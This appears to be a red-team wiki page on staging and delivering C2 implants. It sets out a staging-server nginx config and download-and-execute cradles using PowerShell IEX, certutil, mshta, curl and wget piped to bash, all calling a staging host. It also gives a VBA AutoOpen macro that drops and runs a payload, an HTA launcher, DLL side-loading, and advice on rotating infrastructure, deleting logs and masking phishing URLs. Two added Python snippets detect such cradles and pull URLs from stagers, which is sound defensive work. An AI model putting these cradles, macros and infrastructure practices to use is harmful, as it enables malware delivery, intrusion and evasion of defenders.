Payload Staging and Delivery
# Overview
Payload staging determines how the implant reaches the target. Staged payloads download the full implant at runtime (smaller initial footprint), while stageless payloads contain everything in one file (simpler but larger). This section covers staging strategies, delivery methods, and infrastructure lifecycle management.
# Staged vs Stageless
| Aspect | Staged | Stageless |
|---|---|---|
| Size (initial) | Small (stager: ~15KB) | Large (full implant: ~300KB+) |
| Network calls | Two (stager download + C2) | One (C2 connection) |
| Detection risk | Higher (two connections, staging URL) | Lower (single connection) |
| Flexibility | Can rotate payload after initial access | Must recompile to change |
| EDR evasion | Harder (stager behavior flagged) | Easier (single file, no download) |
| When to use | Disk space constrained, need flexibility | EDR-heavy environments |
# Staged Payload Architecture
1. Initial Access: Target executes stager (15KB)
2. Stager connects to staging URL (via redirector)
3. Stager downloads full implant (300KB)
4. Implant executes and connects to C2 (via redirector)
5. Stager self-deletes
# Staging Server Setup
The staging server sits behind the redirector and serves the full implant to stagers.
```nginx
# Staging server Nginx config (separate from C2 redirector)
server {
    listen 443 ssl;
    server_name staging.c2-front.com;
    ssl_certificate /etc/letsencrypt/live/staging.c2-front.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/staging.c2-front.com/privkey.pem;

    # Only serve staging payload to valid stagers
    location /gateway/ {
        # Verify stager token
        if ($http_x_stager_token != "random-secret-token") {
            return 404;
        }
        # Serve the implant payload
        alias /opt/staging/payload.exe;
        default_type application/octet-stream;
        add_header Content-Disposition 'attachment; filename="update.dll"';
    }

    # Cover traffic: serve legitimate files
    location / {
        root /var/www/cover-site;
    }
}
```
# Stager Examples
PowerShell Cradle (Windows)
```powershell
# Download and execute in memory (no file on disk)
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://staging.c2-front.com/gateway/')"

# With TLS 1.2 enforcement
powershell -nop -w hidden -c "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12; IEX (New-Object Net.WebClient).DownloadString('https://staging.c2-front.com/gateway/')"

# Using Invoke-WebRequest (PowerShell 3+)
powershell -nop -w hidden -c "IWR -Uri 'https://staging.c2-front.com/gateway/' -UseBasicParsing | IEX"
```
certutil (Windows)
```bat
:: Download payload
certutil -urlcache -split -f https://staging.c2-front.com/gateway/update.dll C:\Windows\Temp\update.dll

:: Execute
rundll32 C:\Windows\Temp\update.dll,Start

:: Clean up certutil cache
certutil -urlcache -split -f https://staging.c2-front.com/gateway/update.dll delete
```
mshta (Windows)
```bat
:: Execute HTA payload from staging server
mshta https://staging.c2-front.com/gateway/payload.hta
```
curl (Linux)
```bash
# Download and execute
curl -s https://staging.c2-front.com/gateway/ | bash

# Download, save, chmod, execute
curl -s -o /tmp/update https://staging.c2-front.com/gateway/
chmod +x /tmp/update
/tmp/update &
```
wget (Linux)
```bash
# Download and execute
wget -qO- https://staging.c2-front.com/gateway/ | bash

# Download to file
wget -q -O /tmp/update https://staging.c2-front.com/gateway/
chmod +x /tmp/update
/tmp/update &
```
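Every cradle above leaves the same small set of traits in a process-creation record (Sysmon Event ID 1 or EDR telemetry): IEX paired with a web download, -nop together with -w hidden, an -enc blob, certutil -urlcache -f with a URL, mshta handed a URL, and curl or wget piped into a shell. The Python below is an added example, not code from the original page; it runs such rules over constructed events, and the event records, rule names and dummy base64 string are all mine.

```python
import re
from typing import Dict, List

# Constructed process-creation events (no real host), modelled on the stager
# command lines shown above plus two benign lines that must NOT fire.
SAMPLE_EVENTS = [
    {"pid": 4120, "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://staging.c2-front.com/gateway/')\""},
    {"pid": 4188, "cmdline": "powershell -nop -w hidden -c \"IWR -Uri 'https://staging.c2-front.com/gateway/' -UseBasicParsing | IEX\""},
    {"pid": 4402, "cmdline": "powershell -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},  # dummy base64
    {"pid": 4301, "cmdline": "certutil -urlcache -split -f https://staging.c2-front.com/gateway/update.dll C:\\Windows\\Temp\\update.dll"},
    {"pid": 4355, "cmdline": "mshta https://staging.c2-front.com/gateway/payload.hta"},
    {"pid": 5002, "cmdline": "bash -c \"curl -s https://staging.c2-front.com/gateway/ | bash\""},
    {"pid": 5100, "cmdline": "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
    {"pid": 5120, "cmdline": "certutil -verify C:\\certs\\server.cer"},
]

# Each rule is (tag, regex). Case-insensitive because PowerShell and cmd are.
RULES = [
    # IEX fed by a web download, in either order: IEX (...).DownloadString  or  IWR ... | IEX
    ("ps_download_cradle", re.compile(
        r"(iex|invoke-expression).*(downloadstring|downloadfile|net\.webclient)"
        r"|\b(downloadstring|iwr|invoke-webrequest)\b.*\|\s*(iex|invoke-expression)", re.I)),
    # -nop/-NoProfile and -w hidden/-WindowStyle hidden together, in any order (lookaheads)
    ("ps_hidden_noprofile", re.compile(
        r"powershell(?=.*\s-nop(rofile)?\b)(?=.*\s-w(indowstyle)?\s+hidden\b)", re.I)),
    # -e / -ec / -enc / -EncodedCommand followed by a base64 blob
    ("ps_encoded_command", re.compile(
        r"powershell.*\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("certutil_urlcache_download", re.compile(r"certutil.*-urlcache.*-f\s+https?://", re.I)),
    ("mshta_remote_hta", re.compile(r"mshta(\.exe)?\s+(https?://|\\\\)", re.I)),
    ("curl_wget_pipe_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b", re.I)),
]


def classify_cmdline(cmdline: str) -> List[str]:
    """Return the tags of every rule that fires on one command line, in RULES order."""
    return [tag for tag, rx in RULES if rx.search(cmdline)]


def scan_events(events: List[Dict]) -> Dict[int, List[str]]:
    """Map pid -> fired tags for every event that matched at least one rule."""
    return {ev["pid"]: tags for ev in events if (tags := classify_cmdline(ev["cmdline"]))}


if __name__ == "__main__":
    for pid, tags in scan_events(SAMPLE_EVENTS).items():
        print(pid, ", ".join(tags))
```

Rule 1 keys on the download-plus-IEX pairing rather than on any hostname, so rotating the staging URL (Phase 4 below) does not affect it; only the hostname-bearing arguments change.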
# Stageless Payload Delivery
For environments with strict egress monitoring, deliver the full implant directly without a staging step.
# Delivery Methods
Macro-Enabled Document
```vb
' VBA macro that extracts and runs embedded payload
Sub AutoOpen()
    Dim payload() As Byte
    ' Read embedded payload from document properties or resource
    payload = GetEmbeddedPayload()

    ' Write to temp file
    Dim fnum As Integer
    fnum = FreeFile
    Open Environ("TEMP") & "\svc.dll" For Binary As #fnum
    Put #fnum, , payload
    Close #fnum

    ' Execute
    Shell "rundll32 " & Environ("TEMP") & "\svc.dll,Start", vbHide
End Sub
```
HTA File
```html
<html>
<body>
<script language="VBScript">
    Set shell = CreateObject("WScript.Shell")
    ' Embed base64-encoded payload, decode and execute
    shell.Run "powershell -nop -w hidden -enc <base64_encoded_command>"
    window.close()
</script>
</body>
</html>
```
DLL Side-Loading
```bash
# Place a legitimate executable and a malicious DLL with the same name
# The legitimate exe loads the malicious DLL at startup
# Example: put malicious version.dll next to legitimate.exe

# On the target:
legitimate.exe   # Loads version.dll → executes payload → connects to C2
```
# Infrastructure Lifecycle
# Phase 1: Setup
```bash
# 1. Register domain (privacy-protected registrar)
# 2. Provision VPS instances (3x redirector, 1x team server)
# 3. Configure DNS (low TTL: 300s for rotation flexibility)
# 4. Deploy redirectors (Ansible/Terraform)
# 5. Start C2 team server
# 6. Generate Let's Encrypt certificates
# 7. Test end-to-end connectivity
```
# Phase 2: Validate
```bash
# 1. Verify redirector filters work (curl with wrong UA should get 404)
curl -A "invalid-ua" https://c2-front.com/api/v1/
# Expected: 404 or cover content

# 2. Verify valid C2 traffic reaches team server
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://c2-front.com/api/v1/
# Expected: C2 response

# 3. Verify TLS certificate is valid
#    -servername sends SNI; </dev/null closes stdin so s_client exits instead of waiting for input
openssl s_client -connect c2-front.com:443 -servername c2-front.com </dev/null 2>/dev/null | grep "Verify return code"
# Expected: Verify return code: 0 (ok)

# 4. Test implant in a VM before deploying
#    Verify it connects, receives tasks, and returns results

# 5. Verify cover website works
curl https://c2-front.com/
# Expected: legitimate-looking content
```
# Phase 3: Use
```bash
# 1. Deploy staged or stageless payload to target
# 2. Monitor implant connections through redirectors
# 3. Verify traffic flows: implant → CDN → redirector → team server
# 4. Conduct operations through C2
```
# Phase 4: Rotate
```bash
# Rotate when:
# - Redirector IP is detected/blocked
# - Domain is flagged
# - Unusual traffic patterns on redirector
# - Scheduled rotation (every 48-72 hours)

# Rotation steps:
# 1. Deploy new redirector (same config, new IP)
# 2. Update DNS A record (TTL 300s → fast propagation)
# 3. Verify new redirector works
# 4. Implant auto-reconnects via DNS
# 5. Decommission old VPS (destroy, don't just stop)
```
# Phase 5: Decommission
```bash
# After engagement:
# 1. Stop all implants (or let kill dates expire)
# 2. Destroy all VPS instances
# 3. Cancel domain registration or let it expire
# 4. Delete DNS records
# 5. Revoke Let's Encrypt certificates
# 6. Delete any local logs/screenshots with infrastructure details
# 7. Confirm no lingering VPS charges
```
# Common Pitfalls
- Staging URL in binary: Stagers contain the staging URL in plaintext. If the binary is analyzed, the staging infrastructure is burned.
- Single point of failure: One redirector going down drops all C2. Use DNS round-robin or multiple A records.
- Certificate mismatch: If the staging server cert doesn't match, the implant may refuse to connect.
- Kill date not set: Implants that persist after the engagement are a liability. Always set kill dates.
- Cover site too simple: A single-page HTML cover site is suspicious. Use a full website template.
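The first pitfall is concrete from the analyst's side: a stager that carries its staging URL in plaintext hands over the infrastructure to anyone who runs a strings pass over the sample. This added Python (not from the page) scans a constructed stand-in for a stager binary for URLs stored as ASCII or as UTF-16LE wide strings and reduces them to hostnames for blocklists and log searches; the byte blob and function names are mine, and the page's own hostnames are reused only as sample values.

```python
import re
from typing import List, Set
from urllib.parse import urlsplit

# Constructed stand-in for a stager binary (not a real sample): padding bytes with one
# ASCII URL and one UTF-16LE ("wide") URL embedded, the two ways Windows binaries
# commonly store strings. Hostnames are the page's own, reused for illustration.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"https://staging.c2-front.com/gateway/\x00"
    + b"\xde\xad\xbe\xef" * 4
    + "https://c2-front.com/api/v1/".encode("utf-16-le") + b"\x00\x00"
    + b"X-Stager-Token: random-secret-token\x00"
    + b"\xff" * 8
)

# Printable URL characters; the match stops at a NUL or any other non-URL byte.
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]{4,}")
# A run of 8+ printable ASCII chars each followed by 0x00 is a UTF-16LE wide string.
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")


def extract_urls(blob: bytes) -> List[str]:
    """URLs stored as ASCII (listed first) or as UTF-16LE text, de-duplicated."""
    found: List[str] = []
    for m in URL_RE.finditer(blob):                     # narrow (ASCII) strings
        found.append(m.group().decode("ascii"))
    for m in WIDE_RE.finditer(blob):                    # wide strings, re-narrowed
        narrow = m.group().decode("utf-16-le").encode("ascii")
        found.extend(u.group().decode("ascii") for u in URL_RE.finditer(narrow))
    return list(dict.fromkeys(found))                   # keep order, drop repeats


def extract_hosts(blob: bytes) -> Set[str]:
    """Hostnames to feed a blocklist or a DNS/proxy log search."""
    return {urlsplit(u).hostname for u in extract_urls(blob)}


if __name__ == "__main__":
    for url in extract_urls(SAMPLE_BINARY):
        print(url)
    print(sorted(extract_hosts(SAMPLE_BINARY)))
```

A plain `strings` run misses the wide URL unless invoked with an encoding flag, which is why the second pass is there.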
# OPSEC Considerations
- Use short-lived Let's Encrypt certificates (90-day auto-renewal)
- Set kill dates on all implants (match engagement end date + buffer)
- Use multiple staging URLs for redundancy
- Rotate staging URLs independently of C2 redirectors
- Log all access to staging servers for detection awareness
- Payload delivery URLs should look like legitimate software updates
- Use URL shorteners to mask staging URLs in phishing
# Cross-References
- C2 Framework Setup — Team server and listener configuration
- Redirectors & Fronting — Redirector and CDN setup
- Cloud Tunnels — Cloud-based staging servers
- 03 - Initial Access — Payload delivery techniques